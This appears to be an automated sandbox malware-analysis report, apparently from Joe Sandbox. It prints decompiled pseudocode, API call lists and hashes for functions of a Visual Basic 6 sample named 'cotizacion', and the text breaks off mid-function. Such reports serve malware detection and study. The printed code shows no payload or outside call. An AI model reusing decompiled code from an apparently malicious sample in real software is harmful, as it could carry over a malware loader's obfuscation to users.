Opcode ID: ccc64d89f03bdf17d9ec5e247f152eeef80cbb0a1633238407b28ba3fe46f5e7
Instruction ID: c8ef82b539f552f32f06303f245ef0baee55be66238adabd7546c6e05492e0ba
Opcode Fuzzy Hash: ccc64d89f03bdf17d9ec5e247f152eeef80cbb0a1633238407b28ba3fe46f5e7
Instruction Fuzzy Hash: 2C41F271D10608EFCB00EF95C945BDEBBB4FF48705F10802AE505B62A0DB795A85DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041508B, Relevance: 18.1, APIs: 12, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0041508B(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				signed int _v36;
				void* _v40;
				char _v56;
				char _v72;
				intOrPtr _v96;
				intOrPtr _v104;
				intOrPtr _v112;
				char _v120;
				void* _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr _v144;
				intOrPtr* _v148;
				signed int _v152;
				signed int _v156;
				short _t63;
				signed int _t66;
				signed int _t72;
				signed int _t78;
				intOrPtr _t93;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t93;
				L004016F0();
				_v12 = _t93;
				_v8 = 0x401530;
				_v96 = 0x411624;
				_v104 = 8;
				L004018A0();
				_push(0);
				_push(3);
				_push( &_v56);
				_push( &_v72);
				L00401810();
				_v112 = 0x4118bc;
				_v120 = 0x8008;
				_push( &_v72);
				_t63 =  &_v120;
				_push(_t63);
				L00401828();
				_v124 = _t63;
				_push( &_v72);
				_push( &_v56);
				_push(2);
				L00401942();
				_t66 = _v124;
				if(_t66 != 0) {
					if( *0x4183d8 != 0) {
						_v148 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v148 = 0x4183d8;
					}
					_v124 =  *_v148;
					_t72 =  *((intOrPtr*)( *_v124 + 0x1c))(_v124,  &_v40);
					asm("fclex");
					_v128 = _t72;
					if(_v128 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4116c4);
						_push(_v124);
						_push(_v128);
						L00401906();
						_v152 = _t72;
					}
					_v132 = _v40;
					_v96 = 0x80020004;
					_v104 = 0xa;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t78 =  *((intOrPtr*)( *_v132 + 0x5c))(_v132, 0x10,  &_v36);
					asm("fclex");
					_v136 = _t78;
					if(_v136 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x5c);
						_push(0x411818);
						_push(_v132);
						_push(_v136);
						L00401906();
						_v156 = _t78;
					}
					_t66 = _v36;
					_v144 = _t66;
					_v36 = _v36 & 0x00000000;
					L00401882();
					L004018AC();
				}
				_v28 = 0x190d6de0;
				_v24 = 0x5b03;
				_push(0x415266);
				L00401924();
				return _t66;
			}

0x00415090
0x0041509b
0x0041509c
0x004150a8
0x004150b0
0x004150b3
0x004150ba
0x004150c1
0x004150ce
0x004150d3
0x004150d5
0x004150da
0x004150de
0x004150df
0x004150e4
0x004150eb
0x004150f5
0x004150f6
0x004150f9
0x004150fa
0x004150ff
0x00415106
0x0041510a
0x0041510b
0x0041510d
0x00415115
0x0041511b
0x00415128
0x00415145
0x0041512a
0x0041512a
0x0041512f
0x00415134
0x00415139
0x00415139
0x00415157
0x00415166
0x00415169
0x0041516b
0x00415172
0x0041518e
0x00415174
0x00415174
0x00415176
0x0041517b
0x0041517e
0x00415181
0x00415186
0x00415186
0x00415198
0x0041519b
0x004151a2
0x004151b0
0x004151ba
0x004151bb
0x004151bc
0x004151bd
0x004151c6
0x004151c9
0x004151cb
0x004151d8
0x004151f7
0x004151da
0x004151da
0x004151dc
0x004151e1
0x004151e4
0x004151ea
0x004151ef
0x004151ef
0x004151fe
0x00415201
0x00415207
0x00415214
0x0041521c
0x0041521c
0x00415221
0x00415228
0x0041522f
0x00415260
0x00415265

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 004150A8
__vbaVarDup.MSVBVM60 ref: 004150CE
#717.MSVBVM60(?,?,00000003,00000000), ref: 004150DF
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,00000003,00000000), ref: 004150FA
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,00000003,00000000), ref: 0041510D
__vbaNew2.MSVBVM60(004116D4,004183D8), ref: 00415134
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,0000001C), ref: 00415181
__vbaChkstk.MSVBVM60(?), ref: 004151B0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411818,0000005C), ref: 004151EA
__vbaStrMove.MSVBVM60(00000000,?,00411818,0000005C), ref: 00415214
__vbaFreeObj.MSVBVM60(00000000,?,00411818,0000005C), ref: 0041521C
__vbaFreeStr.MSVBVM60(00415266), ref: 00415260

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckChkstkHresult$#717ListMoveNew2
String ID:
API String ID: 2511207350-0
Opcode ID: af9d07f05d034227d4ff1a456c398601fa6abac49e93656d70fee3ea5cbea512
Instruction ID: cb13df1c6970f5d2c8d3bb3ab69a506ca866eeeadf25d8d98cb4faed32b77cc9
Opcode Fuzzy Hash: af9d07f05d034227d4ff1a456c398601fa6abac49e93656d70fee3ea5cbea512
Instruction Fuzzy Hash: 03510671D00608EFDB11DFA1C945BDEBBB4BF04704F20846AE104BB2A1DB795A85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00414D0B, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00414D0B(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, char __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				intOrPtr _v32;
				char _v40;
				char _v48;
				char _v56;
				char* _v64;
				char _v72;
				short _v92;
				signed int _v100;
				char* _t33;
				intOrPtr _t46;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t46;
				_push(0x50);
				L004016F0();
				_v12 = _t46;
				_v8 = 0x401510;
				_v48 = 0x80020004;
				_v56 = 0xa;
				_v32 = 0x80020004;
				_v40 = 0xa;
				_push( &_v56);
				_push( &_v40);
				asm("fld1");
				_v48 = __fp0;
				asm("fld1");
				_v56 = __fp0;
				asm("fld1");
				_v64 = __fp0;
				asm("fld1");
				_v72 = __fp0;
				L0040181C();
				L0040193C();
				asm("fcomp qword [0x401508]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags == 0) {
					_t10 =  &_v100;
					 *_t10 = _v100 & 0x00000000;
					__eflags =  *_t10;
				} else {
					_v100 = 1;
				}
				_v92 =  ~_v100;
				_push( &_v56);
				_push( &_v40);
				_push(2);
				L00401942();
				_t33 = _v92;
				if(_t33 != 0) {
					_v64 = L"samtaleemnetsrhes";
					_v72 = 8;
					L004018A0();
					_t33 =  &_v40;
					_push(_t33);
					L00401816();
					L00401882();
					L00401912();
				}
				asm("wait");
				_push(0x414e15);
				L00401924();
				return _t33;
			}

0x00414d10
0x00414d1b
0x00414d1c
0x00414d23
0x00414d26
0x00414d2e
0x00414d31
0x00414d38
0x00414d3f
0x00414d46
0x00414d4d
0x00414d57
0x00414d5b
0x00414d5c
0x00414d60
0x00414d63
0x00414d67
0x00414d6a
0x00414d6e
0x00414d71
0x00414d75
0x00414d78
0x00414d7d
0x00414d82
0x00414d88
0x00414d8a
0x00414d8b
0x00414d96
0x00414d96
0x00414d96
0x00414d8d
0x00414d8d
0x00414d8d
0x00414d9f
0x00414da6
0x00414daa
0x00414dab
0x00414dad
0x00414db5
0x00414dbb
0x00414dbd
0x00414dc4
0x00414dd1
0x00414dd6
0x00414dd9
0x00414dda
0x00414de4
0x00414dec
0x00414dec
0x00414df1
0x00414df2
0x00414e0f
0x00414e14

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00414D26
#675.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00414D78
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00414D7D
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00414DAD
__vbaVarDup.MSVBVM60 ref: 00414DD1
#667.MSVBVM60(?), ref: 00414DDA
__vbaStrMove.MSVBVM60(?), ref: 00414DE4
__vbaFreeVar.MSVBVM60(?), ref: 00414DEC
__vbaFreeStr.MSVBVM60(00414E15), ref: 00414E0F

Strings

samtaleemnetsrhes, xrefs: 00414DBD

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$Free$#667#675ChkstkListMove
String ID: samtaleemnetsrhes
API String ID: 724837296-85822442
Opcode ID: 338b0ca404a22d77635fae1f6d37e7de5021a9b0988c1beb9f34a2d4dadaad54
Instruction ID: 1da7b3c755de03374f576a7df8b65a8809d9f9984d5f83b58b6d6e74e79ef3fd
Opcode Fuzzy Hash: 338b0ca404a22d77635fae1f6d37e7de5021a9b0988c1beb9f34a2d4dadaad54
Instruction Fuzzy Hash: 802162B1840208ABDB05EFD1DD56BEEB7B9EF40704F10452EF001B6190DBB95E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041463A, Relevance: 15.1, APIs: 10, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E0041463A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				char _v44;
				char _v60;
				signed int _v80;
				signed int _v84;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				char* _t48;
				signed int _t49;
				char* _t52;
				char* _t53;
				signed int _t58;
				void* _t68;
				void* _t70;
				intOrPtr _t71;

				_t71 = _t70 - 0xc;
				 *[fs:0x0] = _t71;
				L004016F0();
				_v16 = _t71;
				_v12 = 0x401488;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x50,  *[fs:0x0], 0x4016f6, _t68);
				if(0 != 0) {
					_t58 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, 0xb);
					asm("fclex");
					_v80 = _t58;
					if(_v80 >= 0) {
						_v96 = _v96 & 0x00000000;
					} else {
						_push(0x254);
						_push(0x41017c);
						_push(_a4);
						_push(_v80);
						L00401906();
						_v96 = _t58;
					}
				}
				_v60 = 1;
				_t48 =  &_v60;
				_push(_t48);
				L00401864();
				_v80 =  ~(0 | _t48 != 0x0000ffff);
				L00401912();
				_t49 = _v80;
				if(_t49 != 0) {
					if( *0x4183d8 != 0) {
						_v100 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v100 = 0x4183d8;
					}
					_v80 =  *_v100;
					_t52 =  &_v40;
					L004018B8();
					_t53 =  &_v44;
					L004018BE();
					_t49 =  *((intOrPtr*)( *_v80 + 0x10))(_v80, _t53, _t53, _t52, _t52);
					asm("fclex");
					_v84 = _t49;
					if(_v84 >= 0) {
						_v104 = _v104 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x4116c4);
						_push(_v80);
						_push(_v84);
						L00401906();
						_v104 = _t49;
					}
					L004018AC();
				}
				_push(0x414786);
				L00401912();
				return _t49;
			}

0x0041463d
0x0041464c
0x00414656
0x0041465e
0x00414661
0x00414668
0x00414677
0x0041467e
0x0041468a
0x00414690
0x00414692
0x00414699
0x004146b5
0x0041469b
0x0041469b
0x004146a0
0x004146a5
0x004146a8
0x004146ab
0x004146b0
0x004146b0
0x00414699
0x004146b9
0x004146c0
0x004146c3
0x004146c4
0x004146d4
0x004146db
0x004146e0
0x004146e6
0x004146ef
0x00414709
0x004146f1
0x004146f1
0x004146f6
0x004146fb
0x00414700
0x00414700
0x00414715
0x00414718
0x0041471c
0x00414722
0x00414726
0x00414734
0x00414737
0x00414739
0x00414740
0x00414759
0x00414742
0x00414742
0x00414744
0x00414749
0x0041474c
0x0041474f
0x00414754
0x00414754
0x00414760
0x00414760
0x00414765
0x00414780
0x00414785

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00414656
__vbaHresultCheckObj.MSVBVM60(00000000,00401488,0041017C,00000254), ref: 004146AB
#560.MSVBVM60(00000001), ref: 004146C4
__vbaFreeVar.MSVBVM60(00000001), ref: 004146DB
__vbaNew2.MSVBVM60(004116D4,004183D8,00000001), ref: 004146FB
__vbaObjVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041471C
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00414726
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,00000010,?,?,?,?,?,?,?,?,?,00000001), ref: 0041474F
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00000001), ref: 00414760
__vbaFreeVar.MSVBVM60(00414786,00000001), ref: 00414780

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$#560AddrefChkstkNew2
String ID:
API String ID: 70940770-0
Opcode ID: 6e3c70477f82314ad6ac0942a26f43ce97a6f3c20b34454bf5aa514f832f3f28
Instruction ID: 3d3464c6384f3352fad5e88730138318efff7f890b6dab222eeedee7bae31c6d
Opcode Fuzzy Hash: 6e3c70477f82314ad6ac0942a26f43ce97a6f3c20b34454bf5aa514f832f3f28
Instruction Fuzzy Hash: AF313871D00208AFDB00EFA5C849BDEBBB4BF09708F10842AF515BB1A1D7B99985DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004148B3, Relevance: 15.1, APIs: 10, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E004148B3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				long long _v32;
				short _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				signed int _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v72;
				signed int _v76;
				signed int _v80;
				signed int _t41;
				short _t45;
				signed int _t51;
				signed int _t56;
				intOrPtr _t67;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t67;
				_t41 = 0x3c;
				L004016F0();
				_v12 = _t67;
				_v8 = 0x4014b8;
				L00401852();
				_v24 = __fp0;
				_push(0x41180c);
				L00401846();
				L00401882();
				_push(_t41);
				_push(0x411814);
				L0040184C();
				asm("sbb eax, eax");
				_v52 =  ~( ~( ~_t41));
				L00401924();
				_t45 = _v52;
				if(_t45 != 0) {
					if( *0x4183d8 != 0) {
						_v72 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v72 = 0x4183d8;
					}
					_v52 =  *_v72;
					_t51 =  *((intOrPtr*)( *_v52 + 0x1c))(_v52,  &_v44);
					asm("fclex");
					_v56 = _t51;
					if(_v56 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4116c4);
						_push(_v52);
						_push(_v56);
						L00401906();
						_v76 = _t51;
					}
					_v60 = _v44;
					_t56 =  *((intOrPtr*)( *_v60 + 0x64))(_v60, 1,  &_v48);
					asm("fclex");
					_v64 = _t56;
					if(_v64 >= 0) {
						_v80 = _v80 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x411818);
						_push(_v60);
						_push(_v64);
						L00401906();
						_v80 = _t56;
					}
					_t45 = _v48;
					_v36 = _t45;
					L004018AC();
				}
				_v32 =  *0x4014b0;
				asm("wait");
				_push(0x4149fc);
				return _t45;
			}

0x004148b8
0x004148c3
0x004148c4
0x004148cd
0x004148ce
0x004148d6
0x004148d9
0x004148e0
0x004148e5
0x004148e8
0x004148ed
0x004148f7
0x004148fc
0x004148fd
0x00414902
0x00414909
0x0041490f
0x00414916
0x0041491b
0x00414921
0x0041492e
0x00414948
0x00414930
0x00414930
0x00414935
0x0041493a
0x0041493f
0x0041493f
0x00414954
0x00414963
0x00414966
0x00414968
0x0041496f
0x00414988
0x00414971
0x00414971
0x00414973
0x00414978
0x0041497b
0x0041497e
0x00414983
0x00414983
0x0041498f
0x004149a0
0x004149a3
0x004149a5
0x004149ac
0x004149c5
0x004149ae
0x004149ae
0x004149b0
0x004149b5
0x004149b8
0x004149bb
0x004149c0
0x004149c0
0x004149c9
0x004149cd
0x004149d4
0x004149d4
0x004149df
0x004149e2
0x004149e3
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 004148CE
#535.MSVBVM60(?,?,?,?,004016F6), ref: 004148E0
#527.MSVBVM60(0041180C,?,?,?,?,004016F6), ref: 004148ED
__vbaStrMove.MSVBVM60(0041180C,?,?,?,?,004016F6), ref: 004148F7
__vbaStrCmp.MSVBVM60(00411814,00000000,0041180C,?,?,?,?,004016F6), ref: 00414902
__vbaFreeStr.MSVBVM60(00411814,00000000,0041180C,?,?,?,?,004016F6), ref: 00414916
__vbaNew2.MSVBVM60(004116D4,004183D8,00411814,00000000,0041180C,?,?,?,?,004016F6), ref: 0041493A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,0000001C,?,?,?,?,?,?,?,00411814,00000000,0041180C), ref: 0041497E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411818,00000064,?,?,?,?,?,?,?,00411814,00000000,0041180C), ref: 004149BB
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00411814,00000000,0041180C), ref: 004149D4

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$CheckFreeHresult$#527#535ChkstkMoveNew2
String ID:
API String ID: 2200900967-0
Opcode ID: d86af9657b7a111a06ed49c5f8da93a9d17fac8e0919a45a803eddad7bfd8af2
Instruction ID: 5fd20546200ee577b3d688c2e602eb4006cd63748432c88b587da0fdd44afb1f
Opcode Fuzzy Hash: d86af9657b7a111a06ed49c5f8da93a9d17fac8e0919a45a803eddad7bfd8af2
Instruction Fuzzy Hash: A33117B1D50208EFCB00EFA5D945BEEBBB4AF08B14F10852AF401B61A1DB795985CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00416776, Relevance: 13.6, APIs: 9, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00416776(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v40;
				signed int _v52;
				signed int _t27;
				signed int _t31;
				void* _t40;
				void* _t42;
				intOrPtr _t43;

				_t43 = _t42 - 0xc;
				 *[fs:0x0] = _t43;
				L004016F0();
				_v16 = _t43;
				_v12 = 0x401668;
				_v8 = 0;
				_t27 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x4016f6, _t40);
				_push(1);
				L004017A4();
				L00401882();
				_push(_t27);
				_push(0x411a60);
				L0040184C();
				asm("sbb eax, eax");
				_v40 =  ~( ~( ~_t27));
				L00401924();
				_t31 = _v40;
				if(_t31 == 0) {
					L004017C8();
					L0040193C();
					asm("fcomp qword [0x401548]");
					asm("fnstsw ax");
					asm("sahf");
					if(__eflags != 0) {
						L0040183A();
						_t31 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t31);
						asm("fclex");
						_v40 = _t31;
						__eflags = _v40;
						if(_v40 >= 0) {
							_t19 =  &_v52;
							 *_t19 = _v52 & 0x00000000;
							__eflags =  *_t19;
						} else {
							_push(0x64);
							_push(0x41017c);
							_push(_a4);
							_push(_v40);
							L00401906();
							_v52 = _t31;
						}
					}
					_v32 = 0x562c6b10;
					_v28 = 0x5afc;
				}
				asm("wait");
				_push(0x416868);
				return _t31;
			}

0x00416779
0x00416788
0x00416792
0x0041679a
0x0041679d
0x004167a4
0x004167b3
0x004167b6
0x004167b8
0x004167c2
0x004167c7
0x004167c8
0x004167cd
0x004167d4
0x004167da
0x004167e1
0x004167e6
0x004167ec
0x004167f6
0x004167fb
0x00416800
0x00416806
0x00416808
0x00416809
0x00416811
0x0041681f
0x00416822
0x00416824
0x00416827
0x0041682b
0x00416844
0x00416844
0x00416844
0x0041682d
0x0041682d
0x0041682f
0x00416834
0x00416837
0x0041683a
0x0041683f
0x0041683f
0x0041682b
0x00416848
0x0041684f
0x0041684f
0x00416856
0x00416857
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00416792
#525.MSVBVM60(00000001,?,?,?,?,004016F6), ref: 004167B8
__vbaStrMove.MSVBVM60(00000001,?,?,?,?,004016F6), ref: 004167C2
__vbaStrCmp.MSVBVM60(00411A60,00000000,00000001,?,?,?,?,004016F6), ref: 004167CD
__vbaFreeStr.MSVBVM60(00411A60,00000000,00000001,?,?,?,?,004016F6), ref: 004167E1
__vbaFPInt.MSVBVM60(00411A60,00000000,00000001,?,?,?,?,004016F6), ref: 004167F6
__vbaFpR8.MSVBVM60(00411A60,00000000,00000001,?,?,?,?,004016F6), ref: 004167FB
__vbaFpI4.MSVBVM60(00411A60,00000000,00000001,?,?,?,?,004016F6), ref: 00416811
__vbaHresultCheckObj.MSVBVM60(00000000,00401668,0041017C,00000064), ref: 0041683A

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$#525CheckChkstkFreeHresultMove
String ID:
API String ID: 4043493740-0
Opcode ID: 3fa0fcf68f9d91c0e605b8d37b7870a692ded3196413463864ae0f27e6d5ca27
Instruction ID: 8a0e0ce3765bee0e5b7e557a575e2cf1454e4935d57c78b7b714b26f2639e1f5
Opcode Fuzzy Hash: 3fa0fcf68f9d91c0e605b8d37b7870a692ded3196413463864ae0f27e6d5ca27
Instruction Fuzzy Hash: 74215970951208ABCB00AFA5CD05BDE7BB4FF08B44F10416AF401BB1B1DB798A80CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00415F96, Relevance: 10.6, APIs: 7, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00415F96(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr _v72;
				intOrPtr* _v76;
				signed int _v80;
				signed int _v84;
				signed int _t55;
				signed int _t60;
				signed int _t61;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t72 = _t71 - 0xc;
				 *[fs:0x0] = _t72;
				L004016F0();
				_v16 = _t72;
				_v12 = 0x4015d8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x4016f6, _t69);
				if( *0x4183d8 != 0) {
					_v76 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4116d4);
					L004018C4();
					_v76 = 0x4183d8;
				}
				_v48 =  *_v76;
				_t55 =  *((intOrPtr*)( *_v48 + 0x14))(_v48,  &_v44);
				asm("fclex");
				_v52 = _t55;
				if(_v52 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4116c4);
					_push(_v48);
					_push(_v52);
					L00401906();
					_v80 = _t55;
				}
				_v56 = _v44;
				_t60 =  *((intOrPtr*)( *_v56 + 0xe8))(_v56,  &_v40);
				asm("fclex");
				_v60 = _t60;
				if(_v60 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x411840);
					_push(_v56);
					_push(_v60);
					L00401906();
					_v84 = _t60;
				}
				_t61 = _v40;
				_v72 = _t61;
				_v40 = _v40 & 0x00000000;
				L00401882();
				L004018AC();
				_v36 = 0xe5db1d70;
				_v32 = 0x5b00;
				_push(0x4160c8);
				L00401924();
				return _t61;
			}

0x00415f99
0x00415fa8
0x00415fb2
0x00415fba
0x00415fbd
0x00415fc4
0x00415fd3
0x00415fdd
0x00415ff7
0x00415fdf
0x00415fdf
0x00415fe4
0x00415fe9
0x00415fee
0x00415fee
0x00416003
0x00416012
0x00416015
0x00416017
0x0041601e
0x00416037
0x00416020
0x00416020
0x00416022
0x00416027
0x0041602a
0x0041602d
0x00416032
0x00416032
0x0041603e
0x0041604d
0x00416053
0x00416055
0x0041605c
0x00416078
0x0041605e
0x0041605e
0x00416063
0x00416068
0x0041606b
0x0041606e
0x00416073
0x00416073
0x0041607c
0x0041607f
0x00416082
0x0041608c
0x00416094
0x00416099
0x004160a0
0x004160a7
0x004160c2
0x004160c7

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00415FB2
__vbaNew2.MSVBVM60(004116D4,004183D8,?,?,?,?,004016F6), ref: 00415FE9
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,00000014), ref: 0041602D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411840,000000E8), ref: 0041606E
__vbaStrMove.MSVBVM60 ref: 0041608C
__vbaFreeObj.MSVBVM60 ref: 00416094
__vbaFreeStr.MSVBVM60(004160C8), ref: 004160C2

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$CheckFreeHresult$ChkstkMoveNew2
String ID:
API String ID: 1253681662-0
Opcode ID: be81144078a2687d50e6355aba7fa5151c31d91792ba9ab3922a7747dc52b422
Instruction ID: 622a60f2eabdfefb22319f9b79b211b9d0f59da3311e867670f361b8f32cd3f3
Opcode Fuzzy Hash: be81144078a2687d50e6355aba7fa5151c31d91792ba9ab3922a7747dc52b422
Instruction Fuzzy Hash: AB31E171D00208EFCB00EF95C945BDEBBB1AF08755F20842AF505B72A0C7B9A985DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004147A5, Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E004147A5(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				void* _v28;
				long long _v36;
				signed int _v40;
				char* _v48;
				char _v56;
				intOrPtr* _v60;
				signed int _v64;
				signed int _v72;
				intOrPtr* _v76;
				signed int _v80;
				char* _t34;
				char* _t35;
				signed int _t41;
				intOrPtr _t52;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_push(0x3c);
				L004016F0();
				_v12 = _t52;
				_v8 = 0x4014a0;
				_v48 =  &_v24;
				_v56 = 0x6003;
				_t34 =  &_v56;
				_push(_t34);
				L0040185E();
				if(_t34 != 0xffff) {
					if( *0x4183d8 != 0) {
						_v76 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v76 = 0x4183d8;
					}
					_v60 =  *_v76;
					_t41 =  *((intOrPtr*)( *_v60 + 0x48))(_v60, 0x20,  &_v40);
					asm("fclex");
					_v64 = _t41;
					if(_v64 >= 0) {
						_v80 = _v80 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x4116c4);
						_push(_v60);
